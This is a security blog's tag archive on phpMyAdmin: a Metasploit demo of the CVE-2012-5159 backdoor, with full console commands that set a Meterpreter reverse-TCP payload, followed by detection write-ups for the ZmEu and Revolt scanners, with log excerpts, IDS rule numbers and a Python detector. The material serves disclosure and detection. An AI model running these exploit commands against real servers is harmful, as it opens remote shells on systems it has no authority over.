Tag Archives: phpMyAdmin

CVE-2012-5159 phpMyAdmin 3.5.2.2 server_sync.php Backdoor Metasploit Demo

Timeline :

Backdoor discovered by Passerby on 2012-09-25
Vendor notified of the backdoor on 2012-09-25
Metasploit PoC provided on 2012-09-25

PoC provided by :

hdm

Reference(s) :

PMASA-2012-5
CVE-2012-5159
BID-51211

Affected version(s) :

phpMyAdmin-3.5.2.2-all-languages.zip downloaded from the cdnetworks-kr-1 SourceForge.net mirror.

Tested on Ubuntu 11.10 i386 with :

phpMyAdmin-3.5.2.2-all-languages.zip

Description :

This module exploits an arbitrary code execution backdoor placed into phpMyAdmin v3.5.2.2 through a compromised SourceForge mirror.

Commands :

use exploit/multi/http/phpmyadmin_3522_backdoor
set RHOST 192.168.178.40
set PATH /phpMyAdmin-3.5.2.2-all-languages
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.33
exploit

sysinfo
getuid

SUC025 : ZmEu exploit scanner

  • Use Case Reference : SUC025
  • Use Case Title : ZmEu exploit scanner
  • Use Case Detection : IDS / HTTP logs
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : ZmEu bot
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random
  • Destination Port(s) : 80/TCP, 443/TCP

Possible correlation(s) :

  • phpMyAdmin scanner

Source(s) :

Emerging Threats SIG 2010715 triggers when :

  • The HTTP request headers contain the “Made by ZmEu” User-Agent string. Example : “User-Agent: Made by ZmEu @ WhiteHat Team – www.whitehat.ro”
  • The traffic comes from any source port in EXTERNAL_NET and is destined to HTTP_PORTS in HOME_NET.

SIG 2010715 1 Week events activity
SIG 2010715 1 month events activity
1 Month TOP 10 source IPs for SIG 2010715

SUC004 : phpMyAdmin User-Agent Revolt Scanner

  • Use Case Reference : SUC004
  • Use Case Title : phpMyAdmin User-Agent Revolt Scanner
  • Use Case Detection : HTTP Logs / IDS
  • Attacker Class : Opportunists
  • Attack Sophistication : Unsophisticated
  • Identified tool(s) : Revolt Scanner
  • Source IP(s) : Random
  • Source Countries : Random
  • Source Port(s) : Random port, but static source port when scan is initiated
  • Destination Port(s) : 80/TCP, 443/TCP

Possible correlation(s) :

  • phpMyAdmin scanner

Source(s) :

During your daily HTTP log check, you have surely noticed this kind of pattern.

...
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/mysql/sqlmanager/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/mysql/mysqlmanager/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpMyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpMyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:54 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmyadmin2/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/2phpmyadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phpmy/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/phppma/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/myadmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/MyAdmin/ HTTP/1.1" 301 - "-" "revolt"
209.200.33.196 - - [23/Apr/2010:11:39:55 +0200] "HEAD http://xxx.xxx.xxx.xxx:80/program/ HTTP/1.1" 301 - "-" "revolt"
...

These patterns are produced by Revolt Scanner, a web scanner specialized in discovering phpMyAdmin installations. Once the scanner is started, the source port stays static for the complete web directory brute-force discovery. The scanner also only targets the IP address in the DNS A record (IN A) of the domain it is querying.

These scans are detected by the Emerging Threats Snort rules, more precisely rule 2009288, “WEB_SERVER Attack Tool Revolt Scanner”.
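
The two User-Agent markers described in SUC025 and SUC004, together with the burst of HEAD requests visible in the log excerpt above, can also be checked directly against an Apache access log. This is an added example, not part of the original posts or of the Emerging Threats rules; the function names, thresholds and sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

# User-Agent markers quoted on this page; exact match for "revolt" is a choice made here.
UA_SIGNATURES = {"revolt": re.compile(r"^revolt$", re.I), "zmeu": re.compile(r"Made by ZmEu", re.I)}

def parse(lines):
    for line in lines:
        m = LINE_RE.match(line)
        if m:  # lines that are not in combined log format are skipped
            ev = m.groupdict()
            ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
            yield ev

def detect(lines, min_paths=5, window=timedelta(seconds=10)):
    """Return {client_ip: set of reasons}. Thresholds are assumed defaults."""
    findings, probes = defaultdict(set), defaultdict(list)
    for ev in parse(lines):
        for name, rx in UA_SIGNATURES.items():
            if rx.search(ev["ua"]):
                findings[ev["ip"]].add("ua:" + name)
        if ev["method"] == "HEAD":
            probes[ev["ip"]].append((ev["ts"], ev["target"]))
    # Behavioural check: many distinct HEAD targets from one client in a short window.
    for ip, hits in probes.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            if len({t for ts, t in hits[i:] if ts - start <= window}) >= min_paths:
                findings[ip].add("head-burst")
                break
    return dict(findings)

def _line(ip, sec, method, path, ua):  # builds one constructed log line
    return (f'{ip} - - [23/Apr/2010:11:39:{sec:02d} +0200] '
            f'"{method} {path} HTTP/1.1" 301 - "-" "{ua}"')

DIRS = ["/phpmyadmin/", "/phpMyAdmin/", "/phpmy/", "/myadmin/", "/MyAdmin/", "/program/"]
# Constructed sample input; client addresses are RFC 5737 documentation ranges.
SAMPLE = ([_line("192.0.2.10", 54, "HEAD", d, "revolt") for d in DIRS]
          + [_line("203.0.113.5", 10 + i, "HEAD", d, "Mozilla/5.0") for i, d in enumerate(DIRS)]
          + [_line("198.51.100.7", 20, "GET", "/", "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"),
             _line("198.51.100.99", 30, "GET", "/index.html", "Mozilla/5.0")])
if __name__ == "__main__":
    print(detect(SAMPLE))
```

The `head-burst` reason does not depend on the User-Agent, so it still flags a directory sweep when the client string has been changed.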

Here you can find the typical list of directories that are scanned by Revolt.

Below are the latest statistics for Revolt agent activity.

1 Month SIG 2009288 events activities
One year SIG 2009288 events activities
1 Month TOP 10 source IPs for SIG 2009288
TOP 20 source countries for SIG 2009288

Growing Revolt Scanner activity

For about a month, growing activity has been observed from the Revolt scanner, which specializes in discovering phpMyAdmin installations. Last year, the same growth in activity preceded the release on the Internet of an exploit for phpMyAdmin, which is also actively used as an attack vector. Could a new, not yet published vulnerability in phpMyAdmin currently be under exploitation?